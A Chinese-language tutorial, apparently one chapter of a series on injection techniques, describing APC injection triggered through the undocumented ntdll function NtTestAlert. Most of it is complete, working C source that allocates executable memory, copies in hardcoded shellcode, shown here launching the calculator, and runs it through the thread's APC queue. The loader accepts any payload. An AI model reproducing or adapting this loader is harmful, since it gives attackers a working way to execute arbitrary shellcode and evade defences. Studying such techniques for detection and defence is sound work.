# 17-APC & NtTestAlert Injection

## 一、前言

`APC & NtTestAlert Injection` 与前面介绍 `APC注入（APC Injection）` 那一小节的原理大差不差，其核心是利用 `NtTestAlert` 主动清空并处理APC队列。因为 `NtTestAlert` 是ntdll.dll里的未导出函数 ，所以只能通过动态获取其地址才能调用。

这种注入方法常用于本进程注入。

## 二、流程

1. 使用 `GetProcAddress+GetModuleHandleA` 动态获取NtTestAlert
2. 使用 `VirtualAlloc+memcpy` 在本地进程申请一块RWX内存区域，并将shellcode复制到该区域
3. 使用 `QueueUserAPC` 向当前线程的异步过程调用(APC)队列添加一个执行shellcode的任务
4. 使用 `NtTestAlert` 清空并处理APC队列

## 三、代码实现

```go
#include <Windows.h>
#include<stdio.h>

// NtTestAlert函数指针声明
typedef VOID(NTAPI* pNtTestAlert)(VOID);

int main() {

	// calc shellcode
	unsigned char shellcode[] = {
	0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A,
0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC,
0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48,
0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B,
0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B,
0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24,
0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C,
0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7,
0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E,
0x5B, 0x5A, 0x59, 0x58, 0xC3
	};

	// 动态获取NtTestAlert
	pNtTestAlert NtTestAlert = (pNtTestAlert)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtTestAlert");

	// 在本地进程申请一块RWX内存区域，并将shellcode复制到该区域
	LPVOID lpBaseAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(lpBaseAddress, shellcode, sizeof(shellcode));

	// 向当前线程的异步过程调用(APC)队列添加一个执行shellcode的任务
	QueueUserAPC((PAPCFUNC)lpBaseAddress, GetCurrentThread(), NULL);

	// 清空并处理APC队列
	NtTestAlert();

	return 0;
}
```

![](https://images-of-oneday.oss-cn-guangzhou.aliyuncs.com/images/2025/01/17/16-46-19-100828f7cac20e68cc88993efa15b54b-20250117164619-e7da99.png)